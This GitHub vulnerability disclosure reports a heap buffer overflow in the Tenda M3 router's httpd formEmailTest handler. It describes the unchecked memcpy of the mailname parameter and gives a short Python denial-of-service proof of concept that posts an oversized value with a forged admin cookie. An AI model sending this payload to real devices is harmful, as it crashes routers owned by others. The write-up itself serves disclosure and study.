Skip to content

Latest commit

 

History

History

formEmailTest-mailname

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Tenda M3 contains heap buffer Overflow Vulnerability

overview

Description

1. Vulnerability Details

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailname to heap buffer.

image-20220819115923913

v3 is the length of mailname, but it doesn’t limit it. so if v3>0x28C, the memcpy(v1, v2, v3) will cause heap buffer overflow

but it can cause segmentation fault when execute memcpy(v1, v2, v3)

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = {
    "mailname": "@"+"a"*0x600, 
    "mailpwd": "a"
}
cookies = {
    "user": "admin"
}
res = requests.post("http://127.0.0.1/goform/testEmail", data=data, cookies=cookies)
print(res.content)

image-20220819120901584

image-20220819121000275

we can see the size of dest is 0x291 and size of src is 0x600

image-20220819121215734